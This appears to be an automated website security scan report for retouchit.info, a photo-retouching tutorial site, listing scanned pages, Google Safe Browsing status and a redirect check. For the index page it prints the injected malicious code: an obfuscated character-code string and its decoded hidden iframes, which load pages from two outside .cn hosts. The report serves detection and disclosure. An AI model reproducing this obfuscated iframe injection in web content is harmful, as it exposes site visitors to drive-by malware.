Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=retouchit.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://retouchit.info/ | 200 OK Content-Length: 8403 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var qJZvsgRNxXKdXzehFBCW = "E60E105E102E114E97E109E101E32E119E105E100E116E104E61E34E52E56E48E34E32E104E101E105E103E104E116E61E34E54E48E34E32E115E114E99E61E34E104E116E116E112E58E47E47E115E116E101E114E110E45E107E97E108E108E105E46E99E110E47E105E110E51E47E105E110E100E101E120E46E112E104E112E34E32E115E116E121E108E101E61E34E98E111E114E100E101E114E58E48E112E120E59E32E112E111E115E105E116E105E111E110E58E114E101E108E97E116E105E118E101E59E32E116E111E112E58E48E112E120E59E32E108E101E102E116E58E45E53E48E48E112 Decoded script: <iframe width="480" height="60" src="http://stern-kalli.cn/in3/index.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Antivirus reports:
Hidden iFrame found. size: 160x129 style: hidden src: http://liteautogreatest.cn:8080/index.php <iframe src="http://liteautogreatest.cn:8080/index.php" width=160 height=129 style="visibility: hidden"> | ||
http://retouchit.info/expandingMenu.js | 200 OK Content-Length: 2445 Content-Type: application/x-javascript | clean |
http://retouchit.info/tutorials/redeye.html | 200 OK Content-Length: 8994 Content-Type: text/html | clean |
http://retouchit.info/tutorials/expandingMenu.js | 404 Not Found Content-Length: 407 Content-Type: text/html | clean |
http://retouchit.info/test404page.js | 404 Not Found Content-Length: 395 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 20008 Content-Type: text/javascript | clean |
http://rwilliamj.hopfeed.com/script/hopfeed.js | 200 OK Content-Length: 216 Content-Type: text/javascript | clean |
http://api.widgetbucks.com/script/ads.js?uid=I4jJlzqXLDDFmcxL | 200 OK Content-Length: 76 Content-Type: text/html | clean |
http://kona.kontera.com/javascript/lib/KonaLibInline.js | 200 OK Content-Length: 15060 Content-Type: text/javascript | clean |
http://retouchit.info/tutorials/whitenteeth.html | 200 OK Content-Length: 8933 Content-Type: text/html | clean |
http://retouchit.info/tutorials/../index.html | 200 OK Content-Length: 8403 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var qJZvsgRNxXKdXzehFBCW = "E60E105E102E114E97E109E101E32E119E105E100E116E104E61E34E52E56E48E34E32E104E101E105E103E104E116E61E34E54E48E34E32E115E114E99E61E34E104E116E116E112E58E47E47E115E116E101E114E110E45E107E97E108E108E105E46E99E110E47E105E110E51E47E105E110E100E101E120E46E112E104E112E34E32E115E116E121E108E101E61E34E98E111E114E100E101E114E58E48E112E120E59E32E112E111E115E105E116E105E111E110E58E114E101E108E97E116E105E118E101E59E32E116E111E112E58E48E112E120E59E32E108E101E102E116E58E45E53E48E48E112 Decoded script: <iframe width="480" height="60" src="http://stern-kalli.cn/in3/index.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Antivirus reports:
Hidden iFrame found. size: 160x129 style: hidden src: http://liteautogreatest.cn:8080/index.php <iframe src="http://liteautogreatest.cn:8080/index.php" width=160 height=129 style="visibility: hidden"> | ||
http://retouchit.info/tutorials/../expandingMenu.js | 200 OK Content-Length: 2445 Content-Type: application/x-javascript | clean |
http://retouchit.info/tutorials/../tutorials/redeye.html | 200 OK Content-Length: 8994 Content-Type: text/html | clean |
http://retouchit.info/tutorials/../tutorials/expandingMenu.js | 404 Not Found Content-Length: 407 Content-Type: text/html | clean |
http://retouchit.info/tutorials/../tutorials/whitenteeth.html | 200 OK Content-Length: 8933 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: retouchit.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Mar 2015 18:38:17 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 8403
Content-Type: text/html
...8403 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: retouchit.info
Referer: http://www.google.com/search?q=retouchit.info
Result:
The result is similar to the first query. There are no suspicious redirects found.